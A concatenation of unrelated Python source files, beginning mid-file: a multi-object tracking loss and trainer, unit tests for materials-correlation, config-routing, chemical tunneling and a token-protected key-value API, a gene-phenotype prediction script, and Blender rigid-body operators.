id_output = self.classifier(id_head).contiguous()
id_loss += self.IDLoss(id_output, id_target)
det_loss = opt.hm_weight * hm_loss + opt.wh_weight * wh_loss + opt.off_weight * off_loss
loss = torch.exp(-self.s_det) * det_loss + torch.exp(-self.s_id) * id_loss + (self.s_det + self.s_id)
loss *= 0.5
#loss = det_loss
#print(loss, hm_loss, wh_loss, off_loss, id_loss)
loss_stats = {'loss': loss, 'hm_loss': hm_loss,
'wh_loss': wh_loss, 'off_loss': off_loss, 'id_loss': id_loss}
return loss, loss_stats
class MotTrainer(BaseTrainer):
def __init__(self, opt, model, optimizer=None):
super(MotTrainer, self).__init__(opt, model, optimizer=optimizer)
def _get_losses(self, opt):
loss_states = ['loss', 'hm_loss', 'wh_loss', 'off_loss', 'id_loss']
loss = MotLoss(opt)
return loss_states, loss
def save_result(self, output, batch, results):
reg = output['reg'] if self.opt.reg_offset else None
dets = mot_decode(
output['hm'], output['wh'], reg=reg,
cat_spec_wh=self.opt.cat_spec_wh, K=self.opt.K)
dets = dets.detach().cpu().numpy().reshape(1, -1, dets.shape[2])
dets_out = ctdet_post_process(
dets.copy(), batch['meta']['c'].cpu().numpy(),
batch['meta']['s'].cpu().numpy(),
output['hm'].shape[2], output['hm'].shape[3], output['hm'].shape[1])
results[batch['meta']['img_id'].cpu().numpy()[0]] = dets_out[0]
|
<reponame>materialsinnovation/pymks
"""
The correlation module test cases
"""
import numpy as np
import dask.array as da
from pymks.fmks.correlations import two_point_stats
from pymks.fmks.correlations import correlations_multiple
# pylint: disable=too-many-arguments
def run_one(size, size_predict, chunk, chunks_predict, periodic_boundary, cutoff):
"""Generic function to test two points stats shape and chunks"""
x_data = np.random.randint(2, size=size)
chunks = (chunk,) + x_data.shape[1:] # pylint: disable=unsubscriptable-object
x_data = da.from_array(x_data, chunks=chunks)
stats = two_point_stats(
x_data, x_data, periodic_boundary=periodic_boundary, cutoff=cutoff
)
assert stats.compute().shape == size_predict
assert stats.chunks == chunks_predict
def test_twodim_odd():
"""This test investigates the stability of the two_point_stats funtion with
a microstrucure that has odd value height and width
"""
run_one((2, 15, 15), (2, 9, 9), 1, ((1, 1), (9,), (9,)), False, 4)
run_one((2, 15, 15), (2, 5, 5), 1, ((1, 1), (5,), (5,)), True, 2)
def test_twodim_even():
"""This test investigates the stability of the two_point_stats funtion with
a microstrucure that has even value height and width
"""
run_one((3, 10, 10), (3, 9, 9), 2, ((2, 1), (9,), (9,)), False, 4)
run_one((3, 10, 10), (3, 5, 5), 2, ((2, 1), (5,), (5,)), True, 2)
def test_twodim_mix1():
"""This test investigates the stability of the two_point_stats funtion with
a microstrucure that has odd value height and even value width
"""
run_one((1, 15, 10), (1, 9, 9), 1, ((1,), (9,), (9,)), False, 4)
run_one((1, 15, 10), (1, 5, 5), 1, ((1,), (5,), (5,)), True, 2)
def test_twodim_mix2():
"""This test investigates the stability of the two_point_stats funtion with
a microstrucure that has even value height and odd value width
"""
run_one((1, 10, 15), (1, 9, 9), 1, ((1,), (9,), (9,)), False, 4)
run_one((1, 10, 15), (1, 5, 5), 1, ((1,), (5,), (5,)), True, 2)
def test_threedim():
"""This test investigates the stability of the two_point_stats funtion with
3D microstrucure"""
run_one((4, 10, 10, 15), (4, 9, 9, 9), 2, ((2, 2), (9,), (9,), (9,)), False, 4)
run_one((4, 10, 10, 15), (4, 5, 5, 5), 2, ((2, 2), (5,), (5,), (5,)), True, 2)
def test_onedim():
"""Test 1D microstructure"""
run_one((4, 10), (4, 9), 2, ((2, 2), (9,)), False, 4)
run_one((4, 10), (4, 5), 2, ((2, 2), (5,)), True, 2)
def test_correlations_multiple():
"""Test that correlations_multiple chunks correctly.
Test for bug fix. Previously, chunks were ((1, 1), (3,), (3,), (1,
1)) for this example.
"""
darr = da.random.randint(2, size=(2, 4, 4, 2), chunks=(1, 4, 4, 2))
out = correlations_multiple(darr, [[0, 0], [0, 1]])
assert out.chunks == ((1, 1), (5,), (5,), (2,))
def test_small_correlatoions_multiple():
"""Test cases to address
https://github.com/materialsinnovation/pymks/issues/562
"""
data = np.array([[[1, 0], [0, 1]]])
assert np.allclose(correlations_multiple(data, [[0, 0]]), [[[0], [1 / 2], [0]]])
data = np.array([[[0, 1], [0, 1], [1, 0]]])
assert np.allclose(correlations_multiple(data, [[0, 0]]), [[[0], [1 / 3], [0]]])
data = np.array([[[0, 1], [0, 1]]])
assert np.allclose(correlations_multiple(data, [[1, 1]]), [[[1], [1], [1]]])
data = np.array([[[0, 1], [0, 1], [1, 0], [1, 0]]])
assert np.allclose(
correlations_multiple(data, [[1, 1]]), [[[0], [1 / 4], [1 / 2], [1 / 4], [0]]]
)
|
#!/usr/bin/env python
import click as ck
import numpy as np
import pandas as pd
import tensorflow as tf
import tensorflow_addons as tfa
import logging
import math
import time
import sys
import os
from collections import deque
from tensorflow.keras.models import Model, load_model
from tensorflow.keras.layers import Layer
from tensorflow.keras import backend as K
from tensorflow.keras.utils import Sequence
from sklearn.metrics import roc_curve, auc, matthews_corrcoef
from deeppheno.aminoacids import MAXLEN, to_onehot
from deeppheno.utils import Ontology, FUNC_DICT, is_exp_code
from kerastuner.tuners import RandomSearch
from kerastuner import HyperModel
logging.basicConfig(level=logging.DEBUG)
class HPOLayer(Layer):
def __init__(self, nb_classes, **kwargs):
self.nb_classes = nb_classes
self.hpo_matrix = np.zeros((nb_classes, nb_classes), dtype=np.float32)
super(HPOLayer, self).__init__(**kwargs)
def set_hpo_matrix(self, hpo_matrix):
self.hpo_matrix = hpo_matrix
def get_config(self):
config = super(HPOLayer, self).get_config()
config['nb_classes'] = self.nb_classes
return config
def build(self, input_shape):
self.kernel = K.variable(
self.hpo_matrix, name='{}_kernel'.format(self.name))
self.non_trainable_weights.append(self.kernel)
super(HPOLayer, self).build(input_shape) # Be sure to call this at the end
def call(self, x):
x = tf.keras.backend.repeat(x, self.nb_classes)
return tf.math.multiply(x, self.kernel)
def compute_output_shape(self, input_shape):
return [input_shape[0], self.nb_classes, self.nb_classes]
@ck.command()
@ck.option('--data-root', '-dr', default='data/', help='Data root folder', required=True)
@ck.option(
'--in-file', '-if', required=True,
help='Input file. TSV file with a list of genes with GO annotations (semicolon-space separated)')
@ck.option(
'--hp-file', '-hf', default='hp.obo',
help='Human Phenotype Ontology file in OBO Format')
@ck.option(
'--go-file', '-gof', default='go.obo',
help='Gene Ontology file in OBO Format')
@ck.option(
'--terms-file', '-tf', default='terms.pkl',
help='Data file with sequences and complete set of annotations')
@ck.option(
'--gos-file', '-gf', default='gos.pkl',
help='DataFrame with list of GO classes (as features)')
@ck.option(
'--exp-file', '-ef', default='E-MTAB-5214-query-results.tpms.tsv',
help='DataFrame with list of GO classes (as features)')
@ck.option(
'--model-file', '-mf', default='model.h5',
help='DeepPheno model')
@ck.option(
'--out-file', '-o', default='predictions.tsv',
help='Result file with predictions')
@ck.option(
'--batch-size', '-bs', default=32,
help='Batch size')
@ck.option(
'--threshold', '-th', default=0.5,
help='Prediction threshold')
def main(data_root, in_file, hp_file, go_file, terms_file, gos_file, exp_file,
model_file, out_file, batch_size, threshold):
# Check data folder and required files
try:
if os.path.exists(data_root):
hp_file = os.path.join(data_root, hp_file)
go_file = os.path.join(data_root, go_file)
model_file = os.path.join(data_root, model_file)
terms_file = os.path.join(data_root, terms_file)
gos_file = os.path.join(data_root, gos_file)
exp_file = os.path.join(data_root, exp_file)
if not os.path.exists(go_file):
raise Exception(f'Gene Ontology file ({go_file}) is missing!')
if not os.path.exists(hp_file):
raise Exception(f'Human Phenotype Ontology file ({hp_file}) is missing!')
if not os.path.exists(model_file):
raise Exception(f'Model file ({model_file}) is missing!')
if not os.path.exists(terms_file):
raise Exception(f'Terms file ({terms_file}) is missing!')
if not os.path.exists(gos_file):
raise Exception(f'GOs file ({gos_file}) is missing!')
if not os.path.exists(exp_file):
raise Exception(f'Expressions file ({exp_file}) is missing!')
else:
raise Exception(f'Data folder {data_root} does not exist!')
except Exception as e:
logging.error(e)
sys.exit(1)
gos_df = pd.read_pickle(gos_file)
gos = gos_df['gos'].values.flatten()
gos_dict = {v: i for i, v in enumerate(gos)}
global hpo
hpo = Ontology(hp_file, with_rels=True)
terms_df = pd.read_pickle(terms_file)
global terms
terms = terms_df['terms'].values.flatten()
global term_set
term_set = set(terms)
df = load_data(in_file, exp_file)
terms_dict = {v: i for i, v in enumerate(terms)}
nb_classes = len(terms)
params = {}
params['nb_classes'] = nb_classes
print(len(terms_dict))
steps = int(math.ceil(len(df) / batch_size))
generator = DFGenerator(df, gos_dict, terms_dict,
len(df))
x, y = generator[0]
print('Loading pretrained model')
model = load_model(model_file, custom_objects={'HPOLayer': HPOLayer})
model.summary()
preds = model.predict(x)
with open(out_file, 'w') as f:
for i, row in enumerate(df.itertuples()):
f.write(row.genes)
for j in range(len(terms)):
if preds[i, j] < 0.1:
continue
f.write(f'\t{terms[j]}|{preds[i, j]:.3f}')
f.write('\n')
def load_data(in_file, exp_file):
gene_exp = {}
with open(exp_file) as f:
for line in f:
if line.startswith('#') or line.startswith('Gene'):
continue
it = line.strip().split('\t')
gene_name = it[1].split()[0].upper()
exp = np.zeros((53,), dtype=np.float32)
for i in range(len(it[2:])):
exp[i] = float(it[2 + i]) if it[2 + i] != '' else 0.0
gene_exp[gene_name] = exp / np.max(exp)
annotations = []
expressions = []
genes = []
with open(in_file) as f:
for line in f:
it = line.strip().split('\t')
print(it)
gene_name = it[0].upper()
annots = it[1].split('; ')
exp = np.zeros((53,), dtype=np.float32)
if gene_name in gene_exp:
exp = gene_exp[gene_name]
genes.append(it[0])
annotations.append(annots)
expressions.append(exp)
df = pd.DataFrame(
{'genes': genes, 'annotations': annotations,
'expressions': expressions})
return df
class DFGenerator(Sequence):
def __init__(self, df, gos_dict, terms_dict, batch_size):
self.start = 0
self.size = len(df)
self.df = df
self.batch_size = batch_size
self.terms_dict = terms_dict
self.gos_dict = gos_dict
def __len__(self):
return np.ceil(len(self.df) / float(self.batch_size)).astype(np.int32)
def __getitem__(self, idx):
batch_index = np.arange(
idx * self.batch_size, min(self.size, (idx + 1) * self.batch_size))
df = self.df.iloc[batch_index]
data_gos = np.zeros((len(df), len(self.gos_dict)), dtype=np.float32)
data_exp = np.zeros((len(df), 53), dtype=np.float32)
labels = np.zeros((len(df), len(self.terms_dict)), dtype=np.int32)
for i, row in enumerate(df.itertuples()):
data_exp[i, :] = row.expressions
for t_id in row.annotations:
if t_id in self.gos_dict:
data_gos[i, self.gos_dict[t_id]] = 1
data = [data_gos, data_exp]
return (data, labels)
if __name__ == '__main__':
main()
|
#coding:utf-8
import os
import shutil
import tempfile
import unittest2 as unittest
from cactus.config.file import ConfigFile
from cactus.config.router import ConfigRouter
class TestConfigRouter(unittest.TestCase):
"""
Test that the config router manages multiple files correctly.
"""
def setUp(self):
self.test_dir = tempfile.mkdtemp()
self.path = os.path.join(self.test_dir, "test")
os.mkdir(self.path)
self.path1 = os.path.join(self.path, "conf1.json")
self.path2 = os.path.join(self.path, "conf2.json")
self.conf1 = ConfigFile(self.path1)
self.conf2 = ConfigFile(self.path2)
self.conf1.set("a", 1)
self.conf1.write()
self.conf2.set("b", 2)
self.conf2.write()
def tearDown(self):
shutil.rmtree(self.test_dir)
def test_read(self):
"""
Check that the config router reads correctly from the filesystem
"""
router = ConfigRouter([self.path1, self.path2])
self.assertEqual(router.get("a"), 1)
self.assertEqual(router.get("b"), 2)
self.assertEqual(router.get("c"), None)
def test_read_write(self):
"""
Check that our config is readable after writing it
"""
router = ConfigRouter([self.path1, self.path2])
router.set("a", 3)
router.set("b", 4)
self.assertEqual(3, router.get("a"))
self.assertEqual(4, router.get("b"))
def test_write(self):
"""
Check that the config router writes correctly to the filesystem
"""
router = ConfigRouter([self.path1, self.path2])
router.set("a", 3)
router.set("b", 4)
router.write()
self.conf1.load()
self.conf2.load()
self.assertEqual(self.conf1.get("a"), 3)
self.assertEqual(self.conf1.get("b"), None)
self.assertEqual(self.conf2.get("b"), 4)
self.assertEqual(self.conf2.get("a"), None)
def test_collision(self):
"""
Check that we get the right key when there is a collision
"""
self.conf1.set("b", 3)
self.conf2.set("a", 4)
self.conf1.write()
self.conf2.write()
router = ConfigRouter([self.path1, self.path2])
self.assertEqual(router.get("a"), 1)
self.assertEqual(router.get("b"), 3)
def test_duplicate(self):
"""
Check that the config router handles duplicate files properly.
"""
router = ConfigRouter([self.path1, self.path1])
router.set("a", 3)
router.write()
self.conf1.load()
self.assertEqual(self.conf1.get("a"), 3)
def test_nested(self):
"""
Test that we support nested config for context
"""
self.conf1.set("context", {"k1":"v1"})
self.conf2.set("context", {"k2":"v2"})
self.conf1.write()
self.conf2.write()
router = ConfigRouter([self.path1, self.path2])
context = router.get("context", default={}, nested=True)
self.assertEqual(context.get("k1"), "v1")
self.assertEqual(context.get("k2"), "v2")
def test_dirty(self):
"""
Test that we don't re-write files that we haven't changed
"""
self.conf1.set("a", "b")
self.conf1.write()
with open(self.path1, "w") as f:
f.write("canary")
self.conf1.write()
with open(self.path1) as f:
self.assertEqual("canary", f.read())
def test_missing_file(self):
"""
Test that we don't throw on a missing file, and that the configuration
remains in a consistent state.
"""
wrong_path = os.path.join(self.path, "does_not_exist.json")
self.conf1.set("context", {"k1":"v1"})
self.conf1.write()
router = ConfigRouter([wrong_path, self.path1])
self.assertEqual(router.get("context").get("k1"), "v1")
def test_broken_file(self):
"""
Test that we don't throw on a broken file, and that the configuration
remains in a consistent state.
"""
with open(self.path1, "w") as f:
f.write("{broken}")
self.conf2.set("context", {"k1":"v1"})
self.conf2.write()
router = ConfigRouter([self.path1, self.path2])
self.assertEqual(router.get("context").get("k1"), "v1")
|
#!/usr/bin/env python
# encoding: utf-8
################################################################################
#
# RMG - Reaction Mechanism Generator
#
# Copyright (c) 2002-2009 Prof. <NAME> (<EMAIL>) and the
# RMG Team (<EMAIL>)
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
################################################################################
"""
This script contains unit tests of the :mod:`rmgpy.kinetics.tunneling` module.
"""
import unittest
import numpy
from rmgpy.kinetics.tunneling import Wigner, Eckart
################################################################################
class TestWigner(unittest.TestCase):
"""
Contains unit tests of the :class:`Wigner` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.frequency = -2017.96
self.tunneling = Wigner(
frequency = (self.frequency,"cm^-1"),
)
def test_frequency(self):
"""
Test that the Wigner frequency property was properly set.
"""
self.assertAlmostEqual(self.tunneling.frequency.value_si, self.frequency, 4)
def test_calculateTunnelingFactor(self):
"""
Test the Wigner.calculateTunnelingFactor() method.
"""
Tlist = numpy.array([300,500,1000,1500,2000])
kexplist = numpy.array([4.90263, 2.40495, 1.35124, 1.15611, 1.08781])
for T, kexp in zip(Tlist, kexplist):
kact = self.tunneling.calculateTunnelingFactor(T)
self.assertAlmostEqual(kexp, kact, 4)
def test_pickle(self):
"""
Test that a Wigner object can be successfully pickled and unpickled
with no loss of information.
"""
import cPickle
tunneling = cPickle.loads(cPickle.dumps(self.tunneling))
self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
def test_repr(self):
"""
Test that a Wigner object can be successfully reconstructed from its
repr() output with no loss of information.
"""
tunneling = None
exec('tunneling = {0!r}'.format(self.tunneling))
self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
################################################################################
class TestEckart(unittest.TestCase):
"""
Contains unit tests of the :class:`Eckart` class.
"""
def setUp(self):
"""
A function run before each unit test in this class.
"""
self.frequency = -2017.96
self.E0_reac = -295.563
self.E0_TS = -12.7411
self.E0_prod = (-10.2664) + (-253.48)
self.tunneling = Eckart(
frequency = (self.frequency,"cm^-1"),
E0_reac = (self.E0_reac,"kJ/mol"),
E0_TS = (self.E0_TS,"kJ/mol"),
E0_prod = (self.E0_prod,"kJ/mol"),
)
def test_frequency(self):
"""
Test that the Eckart frequency property was properly set.
"""
self.assertAlmostEqual(self.tunneling.frequency.value_si, self.frequency, 4)
def test_E0_reac(self):
"""
Test that the Eckart E0_reac property was properly set.
"""
self.assertAlmostEqual(self.tunneling.E0_reac.value_si*0.001, self.E0_reac, 4)
def test_E0_TS(self):
"""
Test that the Eckart E0_TS property was properly set.
"""
self.assertAlmostEqual(self.tunneling.E0_TS.value_si*0.001, self.E0_TS, 4)
def test_E0_prod(self):
"""
Test that the Eckart E0_prod property was properly set.
"""
self.assertAlmostEqual(self.tunneling.E0_prod.value_si*0.001, self.E0_prod, 4)
def test_calculateTunnelingFactor(self):
"""
Test the Eckart.calculateTunnelingFactor() method.
"""
Tlist = numpy.array([300,500,1000,1500,2000])
kexplist = numpy.array([1623051., 7.69349, 1.46551, 1.18111, 1.09858])
for T, kexp in zip(Tlist, kexplist):
kact = self.tunneling.calculateTunnelingFactor(T)
self.assertAlmostEqual(kexp, kact, delta=1e-3*kexp)
def test_pickle(self):
"""
Test that an Eckart object can be successfully pickled and
unpickled with no loss of information.
"""
import cPickle
tunneling = cPickle.loads(cPickle.dumps(self.tunneling))
self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
self.assertAlmostEqual(self.tunneling.E0_reac.value, tunneling.E0_reac.value, 3)
self.assertEqual(self.tunneling.E0_reac.units, tunneling.E0_reac.units)
self.assertAlmostEqual(self.tunneling.E0_TS.value, tunneling.E0_TS.value, 3)
self.assertEqual(self.tunneling.E0_TS.units, tunneling.E0_TS.units)
self.assertAlmostEqual(self.tunneling.E0_prod.value, tunneling.E0_prod.value, 3)
self.assertEqual(self.tunneling.E0_prod.units, tunneling.E0_prod.units)
def test_repr(self):
"""
Test that an Eckart object can be successfully reconstructed
from its repr() output with no loss of information.
"""
tunneling = None
exec('tunneling = {0!r}'.format(self.tunneling))
self.assertAlmostEqual(self.tunneling.frequency.value, tunneling.frequency.value, 2)
self.assertEqual(self.tunneling.frequency.units, tunneling.frequency.units)
self.assertAlmostEqual(self.tunneling.E0_reac.value, tunneling.E0_reac.value, 3)
self.assertEqual(self.tunneling.E0_reac.units, tunneling.E0_reac.units)
self.assertAlmostEqual(self.tunneling.E0_TS.value, tunneling.E0_TS.value, 3)
self.assertEqual(self.tunneling.E0_TS.units, tunneling.E0_TS.units)
self.assertAlmostEqual(self.tunneling.E0_prod.value, tunneling.E0_prod.value, 3)
self.assertEqual(self.tunneling.E0_prod.units, tunneling.E0_prod.units)
|
import kvapp_pkg.KVServer as kvs
import pytest
pytest.token = None
def test_auth():
"""
Test if a token is returned
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/auth')
assert response.status_code == 200
assert 'token' in response.get_json()
pytest.token = response.get_json()['token']
assert isinstance(pytest.token, str)
def test_insert_NOK_missing_token():
"""
Test insert in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_insert_NOK_missing_token_2():
"""
Test insert in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'}, headers={'x-access-tokens': ''})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_insert_NOK_invalid_token():
"""
Test insert in case of an invalid token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'}, headers={'x-access-tokens': '<PASSWORD>'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is invalid'
def test_insert_NOK_undef_params():
"""
Test insert with wrong parameters
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték', 'extra': 'extra'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 400
assert response.get_json()['msg'] == 'undefined parameter settings'
def test_insert_OK():
"""
Test insert when everything is OK
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.post('/api/insert', json={'key': 'kulcs', 'value': 'érték'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 201
assert response.get_json() == {'key': 'kulcs', 'value': 'érték'}
def test_search_by_key_NOK_missing_token():
"""
Test search by key in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcs'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_search_by_key_NOK_missing_token_2():
"""
Test search by key in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcs'}, headers={'x-access-tokens': ''})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_search_by_key_NOK_invalid_token():
"""
Test search by key in case of an invalid token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcs'}, headers={'x-access-tokens': '<PASSWORD>'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is invalid'
def test_search_by_key_NOK_undef_params():
"""
Test search by key in case of wrong parameters
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcs', 'ismeretlen': 'ism'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 400
assert response.get_json()['msg'] == 'undefined parameter settings'
def test_search_by_key_OK_no_result():
"""
Test search by key with no result
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcsa'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 204
assert response.get_json() is None
def test_search_by_key_OK():
"""
Test search by key when everything is OK
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'key': 'kulcs'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 200
assert response.get_json() == {'key': 'kulcs', 'value': 'érték'}
# test_search_by_prefix OK, NOK
def test_search_by_prefix_NOK_missing_token():
"""
Test search by prefix in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'ért'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_search_by_prefix_NOK_missing_token_2():
"""
Test search by prefix in case of a missing token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'ért'}, headers={'x-access-tokens': ''})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is missing'
def test_search_by_prefix_NOK_invalid_token():
"""
Test search by prefix in case of an invalid token
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'ért'}, headers={'x-access-tokens': 'ross<PASSWORD>'})
assert response.status_code == 400
assert response.get_json()['msg'] == 'token is invalid'
def test_search_by_prefix_NOK_undef_params():
"""
Test search by prefix in case of wrong parameters
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'ért', 'ismeretlen': 'ism'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 400
assert response.get_json()['msg'] == 'undefined parameter settings'
def test_search_by_prefix_OK_no_result():
"""
Test search by prefix with no result
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'nincs'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 204
assert response.get_json() is None
def test_search_by_prefix_OK():
"""
Test search by prefix when everything is OK
"""
server = kvs.KVServer()
app = server.get_app()
with app.test_client() as test_client:
response = test_client.get('/api/search', json={'prefix': 'ért'}, headers={'x-access-tokens': pytest.token})
assert response.status_code == 200
assert response.get_json() == {'prefix': 'ért', 'result': [{'key': 'kulcs', 'value': 'érték'}]} |
<reponame>lsr123/PX4-loacl_code
# -*- coding: utf-8 -*-
import bpy
import mathutils
from bpy.types import Operator
import mmd_tools.core.model as mmd_model
from mmd_tools.core import rigid_body
from mmd_tools import utils
class AddRigidBody(Operator):
bl_idname = 'mmd_tools.add_rigid_body'
bl_label = 'Add Rigid Body'
bl_description = 'Adds a Rigid Body'
bl_options = {'PRESET'}
name_j = bpy.props.StringProperty(name='Name', default='Rigid')
name_e = bpy.props.StringProperty(name='Name(Eng)', default='Rigid_e')
rigid_type = bpy.props.EnumProperty(
name='Rigid Type',
items = [
(str(rigid_body.MODE_STATIC), 'Static', '', 1),
(str(rigid_body.MODE_DYNAMIC), 'Dynamic', '', 2),
(str(rigid_body.MODE_DYNAMIC_BONE), 'Dynamic&BoneTrack', '', 3),
],
)
rigid_shape = bpy.props.EnumProperty(
name='Shape',
items = [
('SPHERE', 'Sphere', '', 1),
('BOX', 'Box', '', 2),
('CAPSULE', 'Capsule', '', 3),
],
)
def execute(self, context):
obj = context.active_object
root = mmd_model.Model.findRoot(obj)
rig = mmd_model.Model(root)
mmd_root = rig.rootObject().mmd_root
rigid_shape_list = ['SPHERE', 'BOX', 'CAPSULE']
arm = rig.armature()
loc = (0.0, 0.0, 0.0)
rot = (0.0, 0.0, 0.0)
bone = None
if context.active_pose_bone is not None:
loc = context.active_pose_bone.location
bone = context.active_pose_bone.name
elif context.active_bone is not None:
loc = context.active_bone.head
bone = context.active_bone.name
elif arm is not None and len(arm.pose.bones) > 0:
loc = arm.pose.bones[0].location
bone = arm.pose.bones[0].name
bpy.ops.object.mode_set(mode='OBJECT')
rigid = rig.createRigidBody(
name = self.name_j,
name_e = self.name_e,
shape_type = rigid_shape_list.index(self.rigid_shape),
dynamics_type = int(self.rigid_type),
location = loc,
rotation = rot,
size = mathutils.Vector([2, 2, 2]) * mmd_root.scale,
collision_group_number = 0,
collision_group_mask = [False for i in range(16)],
arm_obj = arm,
mass=1,
friction = 0.0,
angular_damping = 0.5,
linear_damping = 0.5,
bounce = 0.5,
bone = bone,
)
if mmd_root.show_rigid_bodies:
rigid.hide = False
utils.selectAObject(rigid)
else:
rigid.hide = True
utils.selectAObject(obj)
if 'mmd_tools.'+mmd_root.name+'_all' in bpy.data.groups.keys(): # Add Rigid to allObjectsGroup
bpy.data.groups['mmd_tools.'+mmd_root.name+'_all'].objects.link(rigid)
if 'mmd_tools.'+mmd_root.name+'_rigids' in bpy.data.groups.keys(): # Add Rigid to RigidsGroup
bpy.data.groups['mmd_tools.'+mmd_root.name+'_rigids'].objects.link(rigid)
return { 'FINISHED' }
def invoke(self, context, event):
vm = context.window_manager
return vm.invoke_props_dialog(self)
class RemoveRigidBody(Operator):
bl_idname = 'mmd_tools.remove_rigid_body'
bl_label = 'Remove Rigid Body'
bl_description = 'Deletes the currently selected Rigid Body'
bl_options = {'PRESET'}
def execute(self, context):
obj = context.active_object
if obj.mmd_type != 'RIGID_BODY':
self.report({ 'ERROR' }, "Select the Rigid Body to be deleted")
return { 'CANCELLED' }
utils.selectAObject(obj) #ensure this is the only one object select
bpy.ops.object.delete(use_global=True)
return { 'FINISHED' }
class AddJoint(Operator):
bl_idname = 'mmd_tools.add_joint'
bl_label = 'Add Joint'
bl_options = {'PRESET'}
def execute(self, context):
obj = context.active_object
root = mmd_model.Model.findRoot(obj)
rig = mmd_model.Model(root)
mmd_root = rig.rootObject().mmd_root
joint = rig.createJoint(
name = 'Joint',
name_e = 'Joint_e',
location = [0, 0, 0],
rotation = [0, 0, 0],
size = 0.5 * mmd_root.scale,
rigid_a = None,
rigid_b = None,
maximum_location = [0, 0, 0],
minimum_location = [0, 0, 0],
maximum_rotation = [0, 0, 0],
minimum_rotation = [0, 0, 0],
spring_linear = [0, 0, 0],
spring_angular = [0, 0, 0],
)
if mmd_root.show_joints:
joint.hide = False
utils.selectAObject(joint)
else:
joint.hide = True
utils.selectAObject(obj)
if 'mmd_tools.'+mmd_root.name+'_all' in bpy.data.groups.keys(): # Add Joint to allGroup
bpy.data.groups['mmd_tools.'+mmd_root.name+'_all'].link(joint)
if 'mmd_tools.'+mmd_root.name+'_joints' in bpy.data.groups.keys(): # Add Joint to joints group
bpy.data.groups['mmd_tools.'+mmd_root.name+'_joints'].link(joint)
return { 'FINISHED' }
class RemoveJoint(Operator):
bl_idname = 'mmd_tools.remove_joint'
bl_label = 'Remove Joint'
bl_description = 'Deletes the currently selected Joint'
bl_options = {'PRESET'}
def execute(self, context):
obj = context.active_object
if obj.mmd_type != 'JOINT':
self.report({ 'ERROR' }, "Select the Joint to be deleted")
return { 'CANCELLED' }
utils.selectAObject(obj) #ensure this is the only one object select
